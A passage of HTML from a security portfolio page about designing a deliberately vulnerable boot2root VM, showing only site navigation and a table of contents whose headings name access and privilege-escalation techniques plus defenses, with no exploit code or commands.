
<!doctype html>
<html lang="en" class="no-js">
  <head>
    
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      
        <meta name="description" content="Reportistica tecnica, assessment AD/Web/Network, threat modeling e remediation strategy.">
      
      
        <meta name="author" content="Ing. Marco P.">
      
      
        <link rel="canonical" href="https://marcop-sed.github.io/portfolio/eth/">
      
      
        <link rel="prev" href="../lazypwn/">
      
      
      
        
          <link rel="alternate" href="./" hreflang="en">
        
          <link rel="alternate" href="../it/eth/" hreflang="it">
        
      
      
      <link rel="icon" href="../assets/images/favicon.png">
      <meta name="generator" content="mkdocs-1.6.1, mkdocs-material-9.7.6">
    
    
      
        <title>Boot2Root Design - Anime Gallery - Marco Pulicanò - Offensive Security & Engineering Portfolio</title>
      
    
    
      <link rel="stylesheet" href="../assets/stylesheets/main.484c7ddc.min.css">
      
        
        <link rel="stylesheet" href="../assets/stylesheets/palette.ab4e12ef.min.css">
      
      


    
    
      
    
    
      
        
        
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Inter:300,300i,400,400i,700,700i%7CJetBrains+Mono:400,400i,700,700i&display=fallback">
        <style>:root{--md-text-font:"Inter";--md-code-font:"JetBrains Mono"}</style>
      
    
    
    <script>__md_scope=new URL("..",location),__md_hash=e=>[...e].reduce(((e,_)=>(e<<5)-e+_.charCodeAt(0)),0),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
    
      

    
    
  </head>
  
  
    
    
      
    
    
    
    
    <body dir="ltr" data-md-color-scheme="default" data-md-color-primary="black" data-md-color-accent="red">
  
    
    <input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
    <input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
    <label class="md-overlay" for="__drawer"></label>
    <div data-md-component="skip">
      
        
        <a href="#boot2root-vm-design-waifu-gallery-artificial-vulnerability-orchestration" class="md-skip">
          Skip to content
        </a>
      
    </div>
    <div data-md-component="announce">
      
    </div>
    
    
      

  

<header class="md-header md-header--shadow md-header--lifted" data-md-component="header">
  <nav class="md-header__inner md-grid" aria-label="Header">
    <a href=".." title="Marco Pulicanò - Offensive Security &amp; Engineering Portfolio" class="md-header__button md-logo" aria-label="Marco Pulicanò - Offensive Security & Engineering Portfolio" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a1 1 0 0 1 1 1 1 1 0 0 1-1 1 1 1 0 0 1-1-1 1 1 0 0 1 1-1m9 3c0 5.55-3.84 10.74-9 12-5.16-1.26-9-6.45-9-12V5l9-4 9 4zm-9-5a3 3 0 0 0-3 3c0 1.31.83 2.42 2 2.83V18h2v-2h2v-2h-2v-2.17c1.17-.41 2-1.52 2-2.83a3 3 0 0 0-3-3"/></svg>

    </a>
    <label class="md-header__button md-icon" for="__drawer">
      
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3zm0 5h18v2H3zm0 5h18v2H3z"/></svg>
    </label>
    <div class="md-header__title" data-md-component="header-title">
      <div class="md-header__ellipsis">
        <div class="md-header__topic">
          <span class="md-ellipsis">
            Marco Pulicanò - Offensive Security & Engineering Portfolio
          </span>
        </div>
        <div class="md-header__topic" data-md-component="header-topic">
          <span class="md-ellipsis">
            
              Boot2Root Design - Anime Gallery
            
          </span>
        </div>
      </div>
    </div>
    
      
        <form class="md-header__option" data-md-component="palette">
  
    
    
    
    <input class="md-option" data-md-color-media="" data-md-color-scheme="default" data-md-color-primary="black" data-md-color-accent="red"  aria-label="Dark Mode"  type="radio" name="__palette" id="__palette_0">
    
      <label class="md-header__button md-icon" title="Dark Mode" for="__palette_1" hidden>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a4 4 0 0 0-4 4 4 4 0 0 0 4 4 4 4 0 0 0 4-4 4 4 0 0 0-4-4m0 10a6 6 0 0 1-6-6 6 6 0 0 1 6-6 6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12z"/></svg>
      </label>
    
  
    
    
    
    <input class="md-option" data-md-color-media="" data-md-color-scheme="slate" data-md-color-primary="black" data-md-color-accent="red"  aria-label="Light Mode"  type="radio" name="__palette" id="__palette_1">
    
      <label class="md-header__button md-icon" title="Light Mode" for="__palette_0" hidden>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 18c-.89 0-1.74-.2-2.5-.55C11.56 16.5 13 14.42 13 12s-1.44-4.5-3.5-5.45C10.26 6.2 11.11 6 12 6a6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12z"/></svg>
      </label>
    
  
</form>
      
    
    
      <script>var palette=__md_get("__palette");if(palette&&palette.color){if("(prefers-color-scheme)"===palette.color.media){var media=matchMedia("(prefers-color-scheme: light)"),input=document.querySelector(media.matches?"[data-md-color-media='(prefers-color-scheme: light)']":"[data-md-color-media='(prefers-color-scheme: dark)']");palette.color.media=input.getAttribute("data-md-color-media"),palette.color.scheme=input.getAttribute("data-md-color-scheme"),palette.color.primary=input.getAttribute("data-md-color-primary"),palette.color.accent=input.getAttribute("data-md-color-accent")}for(var[key,value]of Object.entries(palette.color))document.body.setAttribute("data-md-color-"+key,value)}</script>
    
    
      <div class="md-header__option">
  <div class="md-select">
    
    <button class="md-header__button md-icon" aria-label="Select language">
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m12.87 15.07-2.54-2.51.03-.03A17.5 17.5 0 0 0 14.07 6H17V4h-7V2H8v2H1v2h11.17C11.5 7.92 10.44 9.75 9 11.35 8.07 10.32 7.3 9.19 6.69 8h-2c.73 1.63 1.73 3.17 2.98 4.56l-5.09 5.02L4 19l5-5 3.11 3.11zM18.5 10h-2L12 22h2l1.12-3h4.75L21 22h2zm-2.62 7 1.62-4.33L19.12 17z"/></svg>
    </button>
    <div class="md-select__inner">
      <ul class="md-select__list">
        
          <li class="md-select__item">
            <a href="./" hreflang="en" class="md-select__link">
              English
            </a>
          </li>
        
          <li class="md-select__item">
            <a href="../it/eth/" hreflang="it" class="md-select__link">
              Italiano
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</div>
    
    
      
      
        <label class="md-header__button md-icon" for="__search">
          
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
        </label>
        <div class="md-search" data-md-component="search" role="dialog">
  <label class="md-search__overlay" for="__search"></label>
  <div class="md-search__inner" role="search">
    <form class="md-search__form" name="search">
      <input type="text" class="md-search__input" name="query" aria-label="Search" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
      <label class="md-search__icon md-icon" for="__search">
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11z"/></svg>
      </label>
      <nav class="md-search__options" aria-label="Search">
        
        <button type="reset" class="md-search__icon md-icon" title="Clear" aria-label="Clear" tabindex="-1">
          
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"/></svg>
        </button>
      </nav>
      
        <div class="md-search__suggest" data-md-component="search-suggest"></div>
      
    </form>
    <div class="md-search__output">
      <div class="md-search__scrollwrap" tabindex="0" data-md-scrollfix>
        <div class="md-search-result" data-md-component="search-result">
          <div class="md-search-result__meta">
            Initializing search
          </div>
          <ol class="md-search-result__list" role="presentation"></ol>
        </div>
      </div>
    </div>
  </div>
</div>
      
    
    
  </nav>
  
    
      
<nav class="md-tabs" aria-label="Tabs" data-md-component="tabs">
  <div class="md-grid">
    <ul class="md-tabs__list">
      
        
  
  
  
  
    <li class="md-tabs__item">
      <a href=".." class="md-tabs__link">
        
  
  
    
  
  🏠 Home

      </a>
    </li>
  

      
        
  
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="../imagery/" class="md-tabs__link">
          
  
  
  🔴 Offensive Security

        </a>
      </li>
    
  

      
        
  
  
  
    
  
  
    
    
      <li class="md-tabs__item md-tabs__item--active">
        <a href="../lazypwn/" class="md-tabs__link">
          
  
  
  ⚙️ Projects

        </a>
      </li>
    
  

      
    </ul>
  </div>
</nav>
    
  
</header>
    
    <div class="md-container" data-md-component="container">
      
      
        
      
      <main class="md-main" data-md-component="main">
        <div class="md-main__inner md-grid">
          
            
              
              <div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    


  


<nav class="md-nav md-nav--primary md-nav--lifted" aria-label="Navigation" data-md-level="0">
  <label class="md-nav__title" for="__drawer">
    <a href=".." title="Marco Pulicanò - Offensive Security &amp; Engineering Portfolio" class="md-nav__button md-logo" aria-label="Marco Pulicanò - Offensive Security & Engineering Portfolio" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a1 1 0 0 1 1 1 1 1 0 0 1-1 1 1 1 0 0 1-1-1 1 1 0 0 1 1-1m9 3c0 5.55-3.84 10.74-9 12-5.16-1.26-9-6.45-9-12V5l9-4 9 4zm-9-5a3 3 0 0 0-3 3c0 1.31.83 2.42 2 2.83V18h2v-2h2v-2h-2v-2.17c1.17-.41 2-1.52 2-2.83a3 3 0 0 0-3-3"/></svg>

    </a>
    Marco Pulicanò - Offensive Security & Engineering Portfolio
  </label>
  
  <ul class="md-nav__list" data-md-scrollfix>
    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href=".." class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    🏠 Home
  

    
  </span>
  
  

      </a>
    </li>
  

    
      
      
  
  
  
  
    
    
    
    
      
      
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_2" >
        
          
          <label class="md-nav__link" for="__nav_2" id="__nav_2_label" tabindex="0">
            
  
  
  <span class="md-ellipsis">
    
  
    🔴 Offensive Security
  

    
  </span>
  
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_2_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_2">
            <span class="md-nav__icon md-icon"></span>
            
  
    🔴 Offensive Security
  

          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../imagery/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    Web Application - Imagery
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../expressway/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    Network & Crypto - Expressway
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../darkzero/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    AD Infrastructure - DarkZero
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../signed/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    Kerberos & SQL - Signed
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
    
  
  
  
    
    
    
    
      
        
        
      
      
    
    
    <li class="md-nav__item md-nav__item--active md-nav__item--section md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_3" checked>
        
          
          <label class="md-nav__link" for="__nav_3" id="__nav_3_label" tabindex="">
            
  
  
  <span class="md-ellipsis">
    
  
    ⚙️ Projects
  

    
  </span>
  
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_3_label" aria-expanded="true">
          <label class="md-nav__title" for="__nav_3">
            <span class="md-nav__icon md-icon"></span>
            
  
    ⚙️ Projects
  

          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../lazypwn/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    LazyPwn CTF Orchestrator
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
              
                
  
  
    
  
  
  
    <li class="md-nav__item md-nav__item--active">
      
      <input class="md-nav__toggle md-toggle" type="checkbox" id="__toc">
      
      
        
      
      
        <label class="md-nav__link md-nav__link--active" for="__toc">
          
  
  
  <span class="md-ellipsis">
    
  
    Boot2Root Design - Anime Gallery
  

    
  </span>
  
  

          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <a href="./" class="md-nav__link md-nav__link--active">
        
  
  
  <span class="md-ellipsis">
    
  
    Boot2Root Design - Anime Gallery
  

    
  </span>
  
  

      </a>
      
        

<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
  
  
  
    
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon"></span>
      Table of contents
    </label>
    <ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#academic-project-design-and-implementation-of-a-controlled-vulnerable-environment" class="md-nav__link">
    <span class="md-ellipsis">
      
        Academic Project: Design and Implementation of a Controlled Vulnerable Environment
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#1-concept-system-architecture" class="md-nav__link">
    <span class="md-ellipsis">
      
        1. Concept &amp; System Architecture
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="1. Concept &amp; System Architecture">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#11-how-we-thought-about-it" class="md-nav__link">
    <span class="md-ellipsis">
      
        1.1 How We Thought About It
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#12-architecture-where-we-put-what" class="md-nav__link">
    <span class="md-ellipsis">
      
        1.2 Architecture: Where We Put What
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#2-vulnerability-landscape-exploitation-chains" class="md-nav__link">
    <span class="md-ellipsis">
      
        2. Vulnerability Landscape &amp; Exploitation Chains
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="2. Vulnerability Landscape &amp; Exploitation Chains">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#21-vulnerability-summary-matrix" class="md-nav__link">
    <span class="md-ellipsis">
      
        2.1 Vulnerability Summary Matrix
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#22-attack-chain-visualization" class="md-nav__link">
    <span class="md-ellipsis">
      
        2.2 Attack Chain Visualization
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#3-access-vulnerabilities-personal-implementation" class="md-nav__link">
    <span class="md-ellipsis">
      
        3. Access Vulnerabilities (Personal Implementation)
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="3. Access Vulnerabilities (Personal Implementation)">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#31-weak-ssh-credentials-easy-mode" class="md-nav__link">
    <span class="md-ellipsis">
      
        3.1 Weak SSH Credentials – Easy Mode
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="3.1 Weak SSH Credentials – Easy Mode">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#setup" class="md-nav__link">
    <span class="md-ellipsis">
      
        Setup
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#the-exploit" class="md-nav__link">
    <span class="md-ellipsis">
      
        The Exploit
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#32-web-command-injection-medium-mode" class="md-nav__link">
    <span class="md-ellipsis">
      
        3.2 Web Command Injection – Medium Mode
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="3.2 Web Command Injection – Medium Mode">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#the-vulnerability" class="md-nav__link">
    <span class="md-ellipsis">
      
        The Vulnerability
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#how-to-solve-it" class="md-nav__link">
    <span class="md-ellipsis">
      
        How to Solve It
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#33-file-upload-bypass-hard-mode" class="md-nav__link">
    <span class="md-ellipsis">
      
        3.3 File Upload Bypass – Hard Mode
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="3.3 File Upload Bypass – Hard Mode">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#the-idea" class="md-nav__link">
    <span class="md-ellipsis">
      
        The Idea
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#how-to-find-it" class="md-nav__link">
    <span class="md-ellipsis">
      
        How to Find It
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#the-exploit_1" class="md-nav__link">
    <span class="md-ellipsis">
      
        The Exploit
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#defense" class="md-nav__link">
    <span class="md-ellipsis">
      
        Defense
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#4-privilege-escalation-how-to-become-root" class="md-nav__link">
    <span class="md-ellipsis">
      
        4. Privilege Escalation – How to Become Root
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="4. Privilege Escalation – How to Become Root">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#41-suid-hping3-easy" class="md-nav__link">
    <span class="md-ellipsis">
      
        4.1 SUID hping3 – Easy
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="4.1 SUID hping3 – Easy">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#what-is-hping3" class="md-nav__link">
    <span class="md-ellipsis">
      
        What is hping3?
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#the-exploit_2" class="md-nav__link">
    <span class="md-ellipsis">
      
        The Exploit
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#why-it-works" class="md-nav__link">
    <span class="md-ellipsis">
      
        Why it works
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#defense_1" class="md-nav__link">
    <span class="md-ellipsis">
      
        Defense
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#42-cronjob-path-hijacking-medium" class="md-nav__link">
    <span class="md-ellipsis">
      
        4.2 Cronjob PATH Hijacking – Medium
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="4.2 Cronjob PATH Hijacking – Medium">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#how-it-works" class="md-nav__link">
    <span class="md-ellipsis">
      
        How it Works
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#vulnerability-discovery-phase" class="md-nav__link">
    <span class="md-ellipsis">
      
        Vulnerability Discovery Phase
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#the-vulnerability-relative-vs-absolute-paths" class="md-nav__link">
    <span class="md-ellipsis">
      
        The Vulnerability: Relative vs Absolute Paths
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#exploitation-chain" class="md-nav__link">
    <span class="md-ellipsis">
      
        Exploitation Chain
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#remediation-multi-layered" class="md-nav__link">
    <span class="md-ellipsis">
      
        Remediation (Multi-Layered)
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#43-ldso-hijacking-hard" class="md-nav__link">
    <span class="md-ellipsis">
      
        4.3 LD.SO Hijacking – Hard
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="4.3 LD.SO Hijacking – Hard">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#how-the-elf-loader-works" class="md-nav__link">
    <span class="md-ellipsis">
      
        How the ELF Loader Works
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#discovery-finding-the-vulnerable-binary" class="md-nav__link">
    <span class="md-ellipsis">
      
        Discovery: Finding the Vulnerable Binary
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#the-exploit-creating-malicious-library" class="md-nav__link">
    <span class="md-ellipsis">
      
        The Exploit: Creating Malicious Library
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#remediation-hardening" class="md-nav__link">
    <span class="md-ellipsis">
      
        Remediation (Hardening)
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#5-how-to-fix-it-defense-strategies" class="md-nav__link">
    <span class="md-ellipsis">
      
        5. How to Fix It – Defense Strategies
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="5. How to Fix It – Defense Strategies">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#51-fix-priorities" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.1 Fix Priorities
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#52-the-defense-strategy" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.2 The Defense Strategy
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
    </ul>
  
</nav>
      
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
  </ul>
</nav>
                  </div>
                </div>
              </div>
            
            
              
              <div class="md-sidebar md-sidebar--secondary" data-md-component="sidebar" data-md-type="toc" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    

<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
  
  
  
    
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon"></span>
      Table of contents
    </label>
    <ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#academic-project-design-and-implementation-of-a-controlled-vulnerable-environment" class="md-nav__link">
    <span class="md-ellipsis">
      
        Academic Project: Design and Implementation of a Controlled Vulnerable Environment
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#1-concept-system-architecture" class="md-nav__link">
    <span class="md-ellipsis">
      
        1. Concept &amp; System Architecture
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="1. Concept &amp; System Architecture">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#11-how-we-thought-about-it" class="md-nav__link">
    <span class="md-ellipsis">
      
        1.1 How We Thought About It
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#12-architecture-where-we-put-what" class="md-nav__link">
    <span class="md-ellipsis">
      
        1.2 Architecture: Where We Put What
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#2-vulnerability-landscape-exploitation-chains" class="md-nav__link">
    <span class="md-ellipsis">
      
        2. Vulnerability Landscape &amp; Exploitation Chains
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="2. Vulnerability Landscape &amp; Exploitation Chains">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#21-vulnerability-summary-matrix" class="md-nav__link">
    <span class="md-ellipsis">
      
        2.1 Vulnerability Summary Matrix
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#22-attack-chain-visualization" class="md-nav__link">
    <span class="md-ellipsis">
      
        2.2 Attack Chain Visualization
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#3-access-vulnerabilities-personal-implementation" class="md-nav__link">
    <span class="md-ellipsis">
      
        3. Access Vulnerabilities (Personal Implementation)
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="3. Access Vulnerabilities (Personal Implementation)">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#31-weak-ssh-credentials-easy-mode" class="md-nav__link">
    <span class="md-ellipsis">
      
        3.1 Weak SSH Credentials – Easy Mode
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="3.1 Weak SSH Credentials – Easy Mode">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#setup" class="md-nav__link">
    <span class="md-ellipsis">
      
        Setup
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#the-exploit" class="md-nav__link">
    <span class="md-ellipsis">
      
        The Exploit
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#32-web-command-injection-medium-mode" class="md-nav__link">
    <span class="md-ellipsis">
      
        3.2 Web Command Injection – Medium Mode
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="3.2 Web Command Injection – Medium Mode">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#the-vulnerability" class="md-nav__link">
    <span class="md-ellipsis">
      
        The Vulnerability
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#how-to-solve-it" class="md-nav__link">
    <span class="md-ellipsis">
      
        How to Solve It
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#33-file-upload-bypass-hard-mode" class="md-nav__link">
    <span class="md-ellipsis">
      
        3.3 File Upload Bypass – Hard Mode
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="3.3 File Upload Bypass – Hard Mode">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#the-idea" class="md-nav__link">
    <span class="md-ellipsis">
      
        The Idea
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#how-to-find-it" class="md-nav__link">
    <span class="md-ellipsis">
      
        How to Find It
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#the-exploit_1" class="md-nav__link">
    <span class="md-ellipsis">
      
        The Exploit
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#defense" class="md-nav__link">
    <span class="md-ellipsis">
      
        Defense
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#4-privilege-escalation-how-to-become-root" class="md-nav__link">
    <span class="md-ellipsis">
      
        4. Privilege Escalation – How to Become Root
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="4. Privilege Escalation – How to Become Root">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#41-suid-hping3-easy" class="md-nav__link">
    <span class="md-ellipsis">
      
        4.1 SUID hping3 – Easy
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="4.1 SUID hping3 – Easy">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#what-is-hping3" class="md-nav__link">
    <span class="md-ellipsis">
      
        What is hping3?
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#the-exploit_2" class="md-nav__link">
    <span class="md-ellipsis">
      
        The Exploit
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#why-it-works" class="md-nav__link">
    <span class="md-ellipsis">
      
        Why it works
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#defense_1" class="md-nav__link">
    <span class="md-ellipsis">
      
        Defense
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#42-cronjob-path-hijacking-medium" class="md-nav__link">
    <span class="md-ellipsis">
      
        4.2 Cronjob PATH Hijacking – Medium
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="4.2 Cronjob PATH Hijacking – Medium">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#how-it-works" class="md-nav__link">
    <span class="md-ellipsis">
      
        How it Works
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
